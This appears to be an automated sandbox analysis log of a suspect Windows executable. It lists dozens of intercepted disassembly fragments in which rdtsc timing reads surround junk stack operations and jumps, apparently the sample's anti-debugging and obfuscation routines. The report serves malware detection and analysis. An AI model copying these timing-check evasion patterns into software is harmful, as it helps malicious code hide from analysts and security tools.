Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA57A7 second address: CA57B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F6F951A9EBEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA57B6 second address: CA57BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA5AA7 second address: CA5AC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA8E98 second address: CA8E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA92D7 second address: CA92F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F6F951A9EB6h 0x00000009 jmp 00007F6F951A9EC5h 0x0000000e pop edi 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA9448 second address: CA944C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA95C5 second address: CA95CB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CA98F1 second address: CA9910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F6F946E7E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F6F946E7E3Fh 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CAB2C2 second address: CAB2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CAFB56 second address: CAFB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6F946E7E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB7527 second address: CB752B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB752B second address: CB7556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 je 00007F6F946E7E59h 0x0000000d jc 00007F6F946E7E49h 0x00000013 jmp 00007F6F946E7E3Dh 0x00000018 jp 00007F6F946E7E36h 0x0000001e push ebx 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB5714 second address: CB5730 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB5730 second address: CB5747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6F946E7E3Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB5747 second address: CB574D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB574D second address: CB5757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6F946E7E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB5757 second address: CB5774 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC0h 0x00000007 ja 00007F6F951A9EB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB5774 second address: CB5782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6F946E7E36h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB58EE second address: CB58F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB58F2 second address: CB5904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F6F946E7E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB5BB4 second address: CB5BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB5BBA second address: CB5BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F946E7E45h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB5D03 second address: CB5D1C instructions: 0x00000000 rdtsc 0x00000002 je 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6F951A9EBBh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB5FA4 second address: CB5FC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E42h 0x00000007 jns 00007F6F946E7E36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB5FC0 second address: CB5FCA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6F951A9EBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB60F2 second address: CB610F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6F946E7E36h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6F946E7E3Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB610F second address: CB6113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB6113 second address: CB6119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB6547 second address: CB654D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB735D second address: CB7363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB7363 second address: CB7367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB7367 second address: CB7391 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6F946E7E3Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F6F946E7E36h 0x00000013 jmp 00007F6F946E7E40h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB7391 second address: CB73A6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jne 00007F6F951A9EBCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB73A6 second address: CB73AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB73AE second address: CB73BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EBBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB73BD second address: CB73C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB9B6C second address: CB9B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB9B70 second address: CB9B94 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6F946E7E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6F946E7E47h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB9B94 second address: CB9BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F6F951A9EBEh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CB9BB2 second address: CB9BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CBFFB0 second address: CBFFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b js 00007F6F951A9ED3h 0x00000011 jmp 00007F6F951A9EC7h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: BFBB23 second address: BFBB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CC0115 second address: CC0145 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F6F951A9EBBh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F6F951A9EC0h 0x00000013 push eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CC0145 second address: CC0149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CD1C0A second address: CD1C38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F6F951A9EC2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CD175A second address: CD175F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CD175F second address: CD177B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6F951A9EC2h 0x00000008 jc 00007F6F951A9EBCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CD18E1 second address: CD18E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CD18E5 second address: CD18EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CD18EE second address: CD18F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CD7AAF second address: CD7ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EC3h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CD7ACA second address: CD7AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CD7AD0 second address: CD7AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CDA9B6 second address: CDA9EF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6F946E7E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 jmp 00007F6F946E7E48h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007F6F946E7E3Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CDA9EF second address: CDAA12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 je 00007F6F951A9EBEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CE7725 second address: CE772E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CE772E second address: CE7737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CE78B5 second address: CE78C9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6F946E7E38h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edi 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CE78C9 second address: CE78EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6F951A9EB6h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007F6F951A9EC5h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CE7C17 second address: CE7C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CE7C1D second address: CE7C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EC8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CE7DB8 second address: CE7DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6F946E7E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CE7DC2 second address: CE7DE0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6F951A9EB6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6F951A9EC2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CE7DE0 second address: CE7DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CE7DE9 second address: CE7DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CE7DF4 second address: CE7DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CE8049 second address: CE804D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: CEB1BD second address: CEB1C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CEB1C3 second address: CEB1EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F951A9EBBh 0x0000000e js 00007F6F951A9EB6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CF00C9 second address: CF00CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: CF00CD second address: CF0105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EC1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F6F951A9EC4h 0x00000011 jmp 00007F6F951A9EBEh 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 pushad 0x0000001a popad 0x0000001b je 00007F6F951A9EB6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: D2F9F5 second address: D2FA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F6F946E7E3Eh 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F6F946E7E36h 0x00000013 jbe 00007F6F946E7E3Eh 0x00000019 jg 00007F6F946E7E36h 0x0000001f push eax 0x00000020 pop eax 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: D2FA1C second address: D2FA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: D2FA27 second address: D2FA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: D2FA2B second address: D2FA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: D3F8F2 second address: D3F903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: D42089 second address: D4208F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E078FA second address: E07900 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E07900 second address: E07905 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E07905 second address: E0790D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06644 second address: E0664A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0664A second address: E06668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F6F946E7E48h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06668 second address: E0666D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0666D second address: E0667D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F6F946E7E36h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06937 second address: E0697C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F6F951A9ECAh 0x0000000b pushad 0x0000000c jmp 00007F6F951A9EBCh 0x00000011 jmp 00007F6F951A9EC0h 0x00000016 push edx 0x00000017 js 00007F6F951A9EB6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E0697C second address: E06984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06CDE second address: E06CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F6F951A9EC7h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06CFE second address: E06D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06F64 second address: E06F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F6F951A9EC1h 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F6F951A9EC5h 0x00000014 jo 00007F6F951A9EB6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06F9C second address: E06FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6F946E7E3Ah 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06FB7 second address: E06FE0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007F6F951A9EB6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6F951A9EBEh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: E06FE0 second address: E06FF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
